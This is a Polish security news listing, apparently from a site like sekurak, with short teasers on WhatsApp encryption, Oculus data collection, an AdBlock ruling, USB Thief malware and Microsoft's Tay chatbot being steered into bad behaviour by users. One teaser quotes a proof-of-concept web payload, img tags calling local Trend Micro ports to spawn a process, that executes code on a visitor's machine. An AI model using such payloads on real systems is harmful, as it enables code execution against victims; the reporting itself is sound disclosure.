Od teraz, korzystając po obu stronach z najnowszej wersji komunikatora WhatsApp, będziemy domyślnie korzystać z szyfrowania end-to-end.
Czytaj dalej »
Wygląda na to, że Oculus Rift (czyli de facto Facebook) nieustannie gromadzi informacje o swych użytkownikach.
Czytaj dalej »
Tavis – rozwalacz antywirusów – Ormandy tym razem tak napisał o trzech produktach Trend Micro: Frankly, the issue is already ridiculously easy to discover and exploit though. Tym razem chodzi o wykonanie kodu na komputerze ofiary, poprzez…odwiedzenie takiego obrazka: <img src=”http://localhost:40000/json/new/?javascript:require(’child_process’).spawnSync(’calc.exe’) <img src=”http://localhost:40001/json/new/?javascript:require(’child_process’).spawnSync(’calc.exe’) <img src=”http://localhost:40002/json/new/?javascript:require(’child_process’).spawnSync(’calc.exe’) Podatne produkty: * Trend Micro…
Czytaj dalej »
Google informuje, że do tej pory około miliona kont Gmail mogło być celem tzw. government-backed attackers. W związku z tym na blogu Google pojawiła się informacja o wprowadzeniu dużego, pełnostronicowego komunikatu ostrzegającego o fakcie ataku na Twoje konto przez siły powiązane z rządami: –ms
Czytaj dalej »
Arstechnica donosi o wyroku nimieckiego sądu, który potwierdza że stosowanie AdBlock Plus jest legalne. Co więcej, jest to już piąty tego typu wyrok wydany w Niemczech, a sami twórcy AdBlock Plus cytują/komentują decyzję sądu w ten sposób: (…) the court said that there is no “contract” between publishers under which users…
Czytaj dalej »
Ideal Conceal to broń palna udająca smartfona. Marzenie przestępców, czy może idealne narzędzie do obrony osobistej?
Czytaj dalej »
TL;DR – zapraszamy na konferencję CybersecPL (8 kwietnia, Warszawa) – w kuluarach będzie można wygrać koszulki sekuraka, gadgety burpa (np. mini-latarki) i ogólnie pogadać z naszą ekipą. Sam organizator – Instytut Kościuszki – pisze o wydarzeniu tak: 8 kwietnia w Warszawie odbędzie się I Polskie Forum Cyberbezpieczeństwa – coroczna konferencja…
Czytaj dalej »
…pod tym enigmatycznym tytułem chciałbym zaprosić wszystkich umiejących pisać ;) do współpracy przy sekurak zinie. Do tej pory mamy wydane 2 numery (> 120 stron!) naszego bezpłatnego magazynu. Kolejny numer chcemy utrzymać w dotychczasowej konwencji (bezpłatny, ładnie wydany, dostępny na platformy mobilne). Jeśli czujesz się na siłach napisać coś sensownego…
Czytaj dalej »
Zgodnie z przewidywaniami Snowdena, FBI poradziło sobie z iPhone’em z San Bernardino bez pomocy Apple.
Czytaj dalej »
Strona VNC Roulette stanowi interesujące ostrzeżenie przed udostępnianiem w Internecie niezabezpieczonych serwerów VNC.
Czytaj dalej »
Badacze z firmy ESET, opublikowali niedawno ciekawe opracowanie dotyczące malware o roboczej nazwie USB Thief. Całość rospowszechnia się z wykorzystaniem odpowiednio przygotowanych pendrajwów i co interesujące, wykradzione z ofiary dane są szyfrowane na wpiętym USB (tym samym z którego rozpoczyna się infekcja). Po jego wyjęciu z komputera nie ma żadnych śladów…
Czytaj dalej »
Gratka dla fanów reverse engineeringu – bezpłatna ponad 900 stronicowa książka w temacie. Z opinii czytelników: It is amazing and unbelievable Thanks for the great work and your book. I love this book! I have several students reading it at the moment, plan to use it in graduate course Its…
Czytaj dalej »
Właśnie ruszył serwis Privacy.com, który jest czymś w rodzaju usługi VPN dla rozmaitych transakcji finansowych i zakupów online.
Czytaj dalej »
Przewodni artykuł najnowszego wydania „Programisty” to „CQRS pragmatycznie” – poruszający problem bardzo popularny w środowiskach stosujących MVC i wzorce pochodne. Dlaczego mapowanie jedna klasa – jedna tabela jest poniekąd wypaczeniem tego, jak powinien wyglądać prawdziwy model? Tego można dowiedzieć się z artykułu Macieja Aniserowicza, który wyjaśnia, w jaki sposób zastosować…
Czytaj dalej »
Tay AI to przygotowany przez Microsoft czat-bot wykorzystujący elementy sztucznej inteligencji. Niestety, w starciu z brutalną internetową rzeczywistością bot okazał się podatny na przejmowanie negatywnych ludzkich zachowań…
Czytaj dalej »